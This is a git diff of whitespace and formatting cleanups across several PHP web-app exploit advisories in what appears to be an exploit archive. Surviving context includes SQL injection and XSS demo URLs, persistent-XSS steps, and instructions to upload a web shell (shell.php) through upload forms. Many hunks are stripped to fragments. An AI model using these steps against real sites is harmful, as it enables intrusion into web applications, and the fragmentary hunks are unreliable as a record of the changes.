diff --git a/exploits/php/webapps/12045.html b/exploits/php/webapps/12045.html index d75920067..5132fd5eb 100644 --- a/exploits/php/webapps/12045.html +++ b/exploits/php/webapps/12045.html @@ -50,7 +50,7 @@ size="2" face="Tahoma"> value="reset" name="B2" style="float: left">


+

diff --git a/exploits/php/webapps/12047.html b/exploits/php/webapps/12047.html index 497a33d3a..0c9e4970e 100644 --- a/exploits/php/webapps/12047.html +++ b/exploits/php/webapps/12047.html @@ -58,7 +58,7 @@ size="2" face="Tahoma"> value="reset" name="B2" style="float: left">


+

diff --git a/exploits/php/webapps/12049.html b/exploits/php/webapps/12049.html index fe124d71e..0a50f28e6 100644 --- a/exploits/php/webapps/12049.html +++ b/exploits/php/webapps/12049.html @@ -39,7 +39,7 @@ or
http://victim  --> -->

@@ -49,7 +49,7 @@ size="2" face="Tahoma"> value="reset" name="B2" style="float: left">


+

diff --git a/exploits/php/webapps/12322.txt b/exploits/php/webapps/12322.txt index 500405950..f538250c1 100644 --- a/exploits/php/webapps/12322.txt +++ b/exploits/php/webapps/12322.txt @@ -42,7 +42,7 @@ MySQL login: MySQL password: MySQL host: -   + diff --git a/exploits/php/webapps/12496.html b/exploits/php/webapps/12496.html index de28999b3..afbbbab4d 100644 --- a/exploits/php/webapps/12496.html +++ b/exploits/php/webapps/12496.html @@ -13,8 +13,8 @@
- - + + @@ -40,15 +40,15 @@ - - + + diff --git a/exploits/php/webapps/12563.txt b/exploits/php/webapps/12563.txt index 57952ea6e..75ccfda8c 100644 --- a/exploits/php/webapps/12563.txt +++ b/exploits/php/webapps/12563.txt @@ -57,7 +57,7 @@ _____________________________________________________________

(only gif png jpg are allowed)

-

Files go to:  http://example.pt/uploads/your_file.php.png

+

Files go to: http://example.pt/uploads/your_file.php.png

diff --git a/exploits/php/webapps/12857.txt b/exploits/php/webapps/12857.txt index 49ee0385f..be9f7ee33 100644 --- a/exploits/php/webapps/12857.txt +++ b/exploits/php/webapps/12857.txt @@ -84,7 +84,7 @@ Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download& FILE NAME:
-  (ex. shell.php)
FILE CONTENTS:
+ (ex. shell.php)
FILE CONTENTS:
diff --git a/exploits/php/webapps/1367.php b/exploits/php/webapps/1367.php index 2d9839b50..6d763e89d 100644 --- a/exploits/php/webapps/1367.php +++ b/exploits/php/webapps/1367.php @@ -90,7 +90,7 @@ $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; - echo ""; + echo ""; for ($li=0; $li<=15; $li++) { echo ""; } @@ -103,7 +103,7 @@ $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) - { echo ""; + { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) diff --git a/exploits/php/webapps/13785.txt b/exploits/php/webapps/13785.txt index e358079ec..17c08a195 100644 --- a/exploits/php/webapps/13785.txt +++ b/exploits/php/webapps/13785.txt @@ -1,23 +1,23 @@ -        ======================================= -          eLMS Pro SQLi and XSS Vulnerability -        ======================================= + ======================================= + eLMS Pro SQLi and XSS Vulnerability + ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 -0     _                   __           __       __                     1 -1   /' \            __  /'__`\        /\ \__  /'__`\                   0 -0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 -1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 -0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 -1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 -0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 -1                  \ \____/ >> Exploit database separated by exploit   0 -0                   \/___/          type (local, remote, DoS, etc.)    1 -1                                                                      1 -0  [+] Site            : Inj3ct0r.com                                  0 -1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 -0                                                                      0 -1               ##########################################             1 -0               I'm Sid3^effects member from Inj3ct0r Team             1 -1               ##########################################             0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : Inj3ct0r.com 0 +1 [+] Support e-mail : submit[at]inj3ct0r.com 1 +0 0 +1 ########################################## 1 +0 I'm Sid3^effects member from Inj3ct0r Team 1 +1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : eLMS Pro SQLi and XSS Vulnerability @@ -49,14 +49,14 @@ smart calendar. IM communication is available for all 3 user levels. Xploit: SQLi Vulnerability -DEMO  URL :http://[site]/subscribe.php?course_id=[sqli] +DEMO URL :http://[site]/subscribe.php?course_id=[sqli] ############################################################################################################### Xploit: XSS Vulnerability -  Attack Pattern: '"--> + Attack Pattern: '"--> -  http://[site]/subscribe.php?course_id=[XSS] + http://[site]/subscribe.php?course_id=[XSS] ############################################################################################################### diff --git a/exploits/php/webapps/13786.txt b/exploits/php/webapps/13786.txt index 291cc2d48..0882a1da0 100644 --- a/exploits/php/webapps/13786.txt +++ b/exploits/php/webapps/13786.txt @@ -1,23 +1,23 @@ -        ======================================= -          PGAUTOPro SQLi and XSS Vulnerability -        ======================================= + ======================================= + PGAUTOPro SQLi and XSS Vulnerability + ======================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 -0     _                   __           __       __                     1 -1   /' \            __  /'__`\        /\ \__  /'__`\                   0 -0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 -1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 -0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 -1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 -0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 -1                  \ \____/ >> Exploit database separated by exploit   0 -0                   \/___/          type (local, remote, DoS, etc.)    1 -1                                                                      1 -0  [+] Site            : Inj3ct0r.com                                  0 -1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1 -0                                                                      0 -1               ##########################################             1 -0               I'm Sid3^effects member from Inj3ct0r Team             1 -1               ##########################################             0 +0 _ __ __ __ 1 +1 /' \ __ /'__`\ /\ \__ /'__`\ 0 +0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 +1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 +0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 +1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 +0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 +1 \ \____/ >> Exploit database separated by exploit 0 +0 \/___/ type (local, remote, DoS, etc.) 1 +1 1 +0 [+] Site : Inj3ct0r.com 0 +1 [+] Support e-mail : submit[at]inj3ct0r.com 1 +0 0 +1 ########################################## 1 +0 I'm Sid3^effects member from Inj3ct0r Team 1 +1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : PGAUTOPro SQLi and XSS Vulnerability @@ -46,7 +46,7 @@ advertisirs, placing your own AdSense contextual ads will let you derive profit Xploit: SQLi Vulnerability -DEMO   +DEMO URL:http://[site]/vehicle/buy_do_search/?order_direction=DESC&&status=1&form_gid=vehicle_user_quick_search_new&back_module=vehicl @@ -55,9 +55,9 @@ e%2Fbuy_do_search&page=[SQLi] ############################################################################################################### Xploit: XSS Vulnerability -  Attack Pattern: '"--> + Attack Pattern: '"--> -  http://[site]/vehicle/buy_do_search/?order_direction=[XSS] + http://[site]/vehicle/buy_do_search/?order_direction=[XSS] ############################################################################################################### diff --git a/exploits/php/webapps/13892.txt b/exploits/php/webapps/13892.txt index 7fe867d2a..8bec9d7b3 100644 --- a/exploits/php/webapps/13892.txt +++ b/exploits/php/webapps/13892.txt @@ -1,12 +1,12 @@ Name : PHPAuctionSystem Upload Vulnerability Date : june, 16 2010 Vendor url :http://www.phpauctions.info/ -Critical Level     : HIGH +Critical Level : HIGH Author : Sid3^effects aKa HaRi special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_ greetz to :All ICW members and my friends :) luv y0 guyz ####################################################################################################### -  + PHPAuctionSystem had various vulnerablities which was found @@ -15,17 +15,17 @@ PHPAuctionSystem had various vulnerablities which was found Xploit:Upload Vulnerability - Step 1: register as a user :) -  - Step 2: goto "sell an item" option + Step 1: register as a user :) + + Step 2: goto "sell an item" option - DEMO URL :http://[site]/select_category.php? + DEMO URL :http://[site]/select_category.php? - Step 3: post ur evil-code in the item description + Step 3: post ur evil-code in the item description - Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P + Step 4:check your item and ur evil script is executed and upload your shell and enjoy :P - demo url :http://[site]/sell.php :) + demo url :http://[site]/sell.php :) ############################################################################################################### diff --git a/exploits/php/webapps/13922.txt b/exploits/php/webapps/13922.txt index 90e3f5958..11fe3a489 100644 --- a/exploits/php/webapps/13922.txt +++ b/exploits/php/webapps/13922.txt @@ -1,6 +1,6 @@ Date : june, 18 2010 Vendor url :http://www.axxis.gr/ -Critical Level     : HIGH +Critical Level : HIGH Author : Sid3^effects aKa HaRi special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_ greetz to :All ICW members and my friends :) luv y0 guyz @@ -32,8 +32,8 @@ Xploit:Persistent xss Vulnerability Step 1 : As always register as a user :P Step 2 : Goto your profile..you will able to see "What's on your mind PRO module:" -  -         INsert your evil XSS script or xss shell ;) and voila + + INsert your evil XSS script or xss shell ;) and voila DEMO URL :http://[site]/index.php?option=com_content&view=frontpage&setLang=en-GB&Itemid=1 diff --git a/exploits/php/webapps/13938.html b/exploits/php/webapps/13938.html index 6c255356c..950c2e598 100644 --- a/exploits/php/webapps/13938.html +++ b/exploits/php/webapps/13938.html @@ -39,7 +39,7 @@ HackTalk Security - + @@ -80,7 +80,7 @@ Please note: You should only enter values in the above fields if you wish to cha - + - + - + diff --git a/exploits/php/webapps/14147.txt b/exploits/php/webapps/14147.txt index 868b437ac..9735f9f15 100644 --- a/exploits/php/webapps/14147.txt +++ b/exploits/php/webapps/14147.txt @@ -16,8 +16,8 @@ admin panel for managing your forum. Also includes support for categories, plugins, languages, and themes." # Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs -        - Mail: security[AT]adeo.com.tr -        - Web: http://security.adeo.com.tr + - Mail: security[AT]adeo.com.tr + - Web: http://security.adeo.com.tr # Vulnerability: If administrator of the board browse PoC attacker can gain privilege diff --git a/exploits/php/webapps/14415.html b/exploits/php/webapps/14415.html index f57197ebf..d3aef4a34 100644 --- a/exploits/php/webapps/14415.html +++ b/exploits/php/webapps/14415.html @@ -35,7 +35,7 @@ EZ-Oscommerce 3.1 Remote File Upload FILE NAME:
-  (ex. shell.php)
FILE CONTENTS:
+ (ex. shell.php)
FILE CONTENTS:
  
  
-   +
   ".$headeri[$li+$ki]."  
  Please note: You should only enter values in the above fields if you wish to change this users password
  @@ -90,7 +90,7 @@ Please note: You should only enter values in the above fields if you wish to cha
  diff --git a/exploits/php/webapps/13999.html b/exploits/php/webapps/13999.html index 657c12818..33e28a729 100644 --- a/exploits/php/webapps/13999.html +++ b/exploits/php/webapps/13999.html @@ -87,7 +87,7 @@ return(true);
 
NOTE: Please be patient, you will not receive any notification until the file is completely transferred.